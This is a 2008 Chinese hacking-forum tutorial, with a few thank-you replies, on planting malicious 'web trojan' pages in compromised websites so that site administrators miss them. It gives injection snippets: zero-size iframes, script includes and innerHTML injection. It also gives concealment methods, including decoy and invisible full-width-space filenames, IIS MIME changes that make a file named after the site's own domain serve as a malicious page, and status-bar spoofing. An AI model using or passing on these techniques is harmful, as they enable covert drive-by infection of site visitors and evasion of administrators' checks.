Board logo

标题: 将网页挂马进行到底 [打印本页]

作者: 柔肠寸断    时间: 2008-6-21 14:50     标题: 将网页挂马进行到底

将网页挂马进行到底
话说某夜,月黑风高。一个黑得不能再黑的黑客,在X网站上挂上了自己苦心免杀的Y网马一只。小马刚刚挂上不久就被无情地咔嚓了!我们英明神勇的Z管理员再一次揪出了藏了又藏的小马……
废话不多说,今天就给大家介绍怎么挂马。也许你会惊讶。挂马,网上不是有流传的方法吗?iframe和Script都能搞得定,怎么还有人来显摆呢?听我说,凡是挂马,最终都是能被发现的(废话!),但是如果能最大限度地躲过检查,那岂不是更妙?因为挂马也是一种艺术。
下面我就给大家介绍几个挂马的绝招,关键是隐藏。首先我们来了解一下常见的几种网页挂马方式,已经会的就直接跳过吧!
1)<iframe src=”muma.htm” width=0 height=0></iframe>
2)<script src=muma.js language=javascript></script>
3)top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="muma.htm "></iframe>'
以上是网上常见的挂马方式。挂马,讲的就是隐蔽,不让对方发现;而且就算发现被挂马,也不能轻易地暴露网马的地址。怎么办呢?我们有绝招!
  
去文件后缀法
大多数情况下,我们挂马都会用到<script src=muma.js></script>和<iframe src=muma.htm></iframe>这两种方式,明眼人一看就知道有问题。我们来简单处理一下,把后缀去掉,同时加上迷惑因子。针对Script调用,我们将调用代码改为<script src=javascript></script>,同时将调用网马的JS文件放在同目录下,改名为javascript。是的,你没看错,网马调用的JS文件就是http://www.shadu120.com/javascript。网马的发现难度是不是一下子增加了不少呢?我们继续改造,调用代码使用<iframe src=width width=0 height=0></iframe>,网马改名为同目录下的width。当然,如果你够“阴险”、够“狡猾”,不怕骂,还可以再考虑其它更迷惑的名字。
  
变异文件后缀法
虽然这招在网上有出现过,但是对其进行总结并延伸的却没有。下面我们来突破一下。很多人都用过<script scr=css.css></script>这种模式挂过马,也就是说Script挂马这种方式并不依赖于文件后缀,但是你见过<iframe src=www.baidu.com></iframe>吗?今天我们就来实现它。当然,这要有一定前提的。网马所在的服务器要在你手里,或者你有网站的IIS管理权限。我们知道,IIS对受访文件的类型是根据扩展名来识别的,比如我们输入index.asp,系统就会调用asp.dll来解析;输入index.htm,就自动解释为HTML代码;如果是exe文件,则直接提示下载。由此触发了我的灵感,何不构造一个自己需要的后缀呢?打开IIS管理器,找到网站,点右键看“属性->HTTP头->文件类型”,新建文件扩展名.com,文件类型为text/html,点击确定后,这个扩展名在网站上就可以使用了,而且会被当作HTML来解析,如图1所示。

接下来,我们进行挂马!在www.shadu120.com网站目录下找到要插入代码的网页index.html,加入代码<iframe src=www.shadu120.com></iframe>。图2大家看懂了吧?就是建一个和网站的名字一样的文件来做网马。刷新http://www.shadu120.com,哇!网马乖乖地出来了,如图3所示。哪个管理员会想到“src=”后面自己网站的域名居然会是个网马呢?哈哈!

无文件名法
这是最后的绝招!这里说的无文件名并不是指网马没有文件名,而是我们给网马起一个看不见的文件名。嘿嘿,既然黑,那就黑到底吧!Windows 2000的IIS不需要额外配置,这里就以Windows 2003为例,因为Windows 2003的IIS默认不支持无后缀文件。打开IIS管理器,找到计算机点右键看属性,再选择MIME类型。新建一个扩展名“.*”,类型填写为text/html或application/postscript,确定后IIS 6.0就支持无后缀文件了,具体操作如图4所示。

OK,下一步我们在网站目录放一个网马,名字改为“■”(注意:■表示中文全角空格!),然后将代码“<iframe src= > < /iframe>”(注意:等号后面是一个中文全角空格)插入到index.html文件中。
现在在浏览器里输入http://www.shadu120.com/,哈哈,看到了什么?或者直接输入http://www.shadu120.com/■,也可以马上看到效果!如图5所示。

另外,Windows下的文件名也可以包含“=”,于是上面这段代码自然就产生了“<iframe src= = ></iframe>”的变形,建一个文件名为“=”的文件作为网马,一样能迷惑管理员的眼睛。
最后再给大家介绍一个细节性的技巧。挂马的时候,最好使用JavaScript修改一下浏览器状态栏的信息,免得调用网马的时候被看到蛛丝马迹。当然,如果你采用的是“无文件名”法,这步可以省略。
网络安全无极限,更多的东西需要我们去探索和突破。希望大家在新的一年里不断努力,继续发挥想象,在有限的空间里打造属于自己的网络安全!
作者: 噯伱╅詠吥變    时间: 2008-6-21 15:23

呵呵!谢谢LZ分享!!
作者: luojiaming    时间: 2009-9-12 14:01

谢谢咯。。
作者: cmdxl    时间: 2009-11-22 16:55

现在的XPSP3我的挂不了!不知道为什么




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2